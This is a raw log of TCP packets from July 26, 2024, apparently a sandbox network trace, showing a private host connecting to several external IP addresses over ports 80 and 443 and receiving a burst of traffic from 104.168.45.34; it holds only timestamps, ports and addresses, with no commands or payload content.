Jul 26, 2024 13:02:34.404669046 CEST	80	49168	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:34.405139923 CEST	49169	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:34.405201912 CEST	443	49169	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:34.405255079 CEST	49169	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:34.405901909 CEST	49169	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:34.405944109 CEST	443	49169	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:34.608145952 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:34.894176006 CEST	443	49169	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:34.894362926 CEST	49169	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:34.899899006 CEST	49169	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:34.899929047 CEST	443	49169	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:34.900326014 CEST	443	49169	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:34.918668985 CEST	49169	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:34.960504055 CEST	443	49169	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:35.173012972 CEST	443	49169	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:35.173099995 CEST	443	49169	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:35.173258066 CEST	49169	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:35.173932076 CEST	49169	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:35.173979998 CEST	443	49169	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:35.174010038 CEST	49169	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:35.174010992 CEST	49169	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:35.174031019 CEST	443	49169	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:35.174047947 CEST	443	49169	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:35.532185078 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:35.537255049 CEST	80	49168	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:35.633759022 CEST	80	49168	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:35.860023975 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:35.932014942 CEST	80	49168	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:35.932159901 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:35.944295883 CEST	49170	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:35.944370031 CEST	443	49170	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:35.944438934 CEST	49170	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:35.944689989 CEST	49170	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:35.944706917 CEST	443	49170	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:36.454968929 CEST	443	49170	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:36.455037117 CEST	49170	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:36.459712982 CEST	49170	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:36.459722996 CEST	443	49170	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:36.460103035 CEST	443	49170	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:36.460990906 CEST	49170	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:36.504520893 CEST	443	49170	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:36.741249084 CEST	443	49170	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:36.741311073 CEST	443	49170	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:36.741368055 CEST	49170	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:36.742568016 CEST	49170	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:36.742614031 CEST	443	49170	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:36.765695095 CEST	49171	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:36.765723944 CEST	443	49171	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:36.766077995 CEST	49171	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:36.766077995 CEST	49171	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:36.766112089 CEST	443	49171	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:37.291665077 CEST	443	49171	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:37.291826010 CEST	49171	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:37.295185089 CEST	49171	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:37.295192957 CEST	443	49171	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:37.295582056 CEST	443	49171	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:37.296324015 CEST	49171	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:37.340511084 CEST	443	49171	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:37.472204924 CEST	443	49171	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:37.472388983 CEST	443	49171	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:37.472472906 CEST	49171	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:37.473038912 CEST	49171	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:37.473053932 CEST	443	49171	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:37.608457088 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:37.613456011 CEST	80	49168	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:37.720797062 CEST	80	49168	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:37.745266914 CEST	49172	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:37.745356083 CEST	443	49172	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:37.745425940 CEST	49172	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:37.745687008 CEST	49172	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:37.745723963 CEST	443	49172	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:37.931011915 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:38.175988913 CEST	80	49168	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:38.176166058 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:38.261321068 CEST	443	49172	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:38.261424065 CEST	49172	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:38.264794111 CEST	49172	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:38.264817953 CEST	443	49172	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:38.265216112 CEST	443	49172	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:38.265969992 CEST	49172	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:38.308516979 CEST	443	49172	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:38.519315004 CEST	443	49172	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:38.519401073 CEST	443	49172	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:38.519679070 CEST	49172	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:38.519747972 CEST	49172	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:38.551752090 CEST	49173	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:38.551780939 CEST	443	49173	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:38.551839113 CEST	49173	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:38.552068949 CEST	49173	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:38.552077055 CEST	443	49173	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:39.053539038 CEST	443	49173	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:39.053651094 CEST	49173	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:39.061238050 CEST	49173	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:39.061278105 CEST	443	49173	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:39.061769962 CEST	443	49173	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:39.062639952 CEST	49173	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:39.104521036 CEST	443	49173	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:39.211950064 CEST	443	49173	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:39.212023020 CEST	443	49173	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:39.212270975 CEST	49173	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:39.212397099 CEST	49173	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:39.212416887 CEST	443	49173	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:39.317632914 CEST	49164	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:39.322634935 CEST	80	49164	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:39.421174049 CEST	80	49164	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:39.421242952 CEST	49164	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:39.423372030 CEST	49174	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:39.423413038 CEST	443	49174	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:39.423634052 CEST	49174	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:39.425836086 CEST	49174	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:39.425849915 CEST	443	49174	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:39.895313025 CEST	443	49174	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:39.895404100 CEST	49174	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:39.973259926 CEST	49174	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:39.973289013 CEST	443	49174	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:39.973762035 CEST	443	49174	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:39.973812103 CEST	49174	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:39.981211901 CEST	49174	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:40.028496027 CEST	443	49174	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:40.217152119 CEST	443	49174	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:40.217262030 CEST	49174	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:40.217281103 CEST	443	49174	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:40.217327118 CEST	443	49174	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:40.217333078 CEST	49174	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:40.217380047 CEST	49174	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:40.217403889 CEST	49174	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:40.217422962 CEST	443	49174	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:40.217434883 CEST	49174	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:40.217473030 CEST	49174	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:40.227960110 CEST	49175	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:40.227994919 CEST	443	49175	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:40.228056908 CEST	49175	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:40.228396893 CEST	49175	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:40.228406906 CEST	443	49175	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:40.902684927 CEST	443	49175	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:40.902827024 CEST	49175	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:40.907824993 CEST	49175	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:40.907844067 CEST	443	49175	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:40.908406973 CEST	443	49175	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:40.908473015 CEST	49175	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:40.912127018 CEST	49175	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:40.956509113 CEST	443	49175	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:41.049659967 CEST	443	49175	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:41.049757957 CEST	443	49175	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:41.049798965 CEST	49175	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:41.049937963 CEST	49175	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:41.049937963 CEST	49175	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:41.362243891 CEST	49175	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:41.362292051 CEST	443	49175	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:41.460884094 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.466100931 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.466173887 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.466311932 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.471816063 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.945300102 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.945391893 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.946031094 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.946070910 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.946083069 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.946110964 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.949464083 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.949497938 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.949527979 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.949548960 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.953345060 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.953377962 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.953397989 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.953408003 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.953412056 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.953445911 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.957155943 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.957190990 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.957204103 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.957230091 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.960098028 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.960134029 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.960150957 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.960165977 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:41.962698936 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:41.962752104 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.032545090 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.032605886 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.033178091 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.033190966 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.033216000 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.033225060 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.036501884 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.036514044 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.036541939 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.036549091 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.039629936 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.039642096 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.039669037 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.039675951 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.043219090 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.043231010 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.043271065 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.046838999 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.046850920 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.046881914 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.046881914 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.049683094 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.049695015 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.049721956 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.052603006 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.052613974 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.052623987 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.052680969 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.052680969 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.052680969 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.053709030 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.055383921 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.055394888 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.055424929 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.055463076 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.058168888 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.058181047 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.058212042 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.059664965 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.060925007 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.060935020 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.060960054 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.060976982 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.063561916 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.063574076 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.063620090 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.120976925 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.120990038 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.121001005 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.121068001 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.123007059 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.123018026 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.123207092 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.125659943 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.125673056 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.125727892 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.128535986 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.128546953 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.128588915 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.131392956 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.131405115 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.131453991 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.131902933 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.133887053 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.133898973 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.133908987 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.133933067 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.133946896 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.136044025 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.136054993 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.136082888 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.136100054 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.138295889 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.138308048 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.138333082 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.138365030 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.140580893 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.140590906 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.140616894 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.140624046 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.142855883 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.142865896 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.142875910 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.142891884 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.142903090 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.145147085 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.145158052 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.145186901 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.145186901 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.147384882 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.147396088 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.147422075 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.147428989 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.149478912 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.149487972 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.149518013 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.151712894 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.151721954 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.151743889 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.151751995 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.153392076 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.153403997 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.153414011 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.153425932 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.153438091 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.153450012 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.155323982 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.155333996 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.155366898 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.155376911 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.157126904 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.157136917 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.157166958 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.157174110 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.158911943 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.158926010 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.158951998 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.158960104 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.160738945 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.160749912 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.160759926 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.160773039 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.160784006 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.162533998 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.162544966 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.162570000 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.162578106 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.164192915 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.164202929 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.164227962 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.164235115 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.166786909 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.208549976 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.208623886 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.208815098 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.208887100 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.208936930 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.208975077 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.210521936 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.210531950 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.210565090 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.210571051 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.212172031 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.212181091 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.212213039 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.212219000 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.214167118 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.214176893 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.214212894 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.215886116 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.215897083 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.215929985 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.215936899 CEST	49176	80	192.168.2.22	104.168.45.34
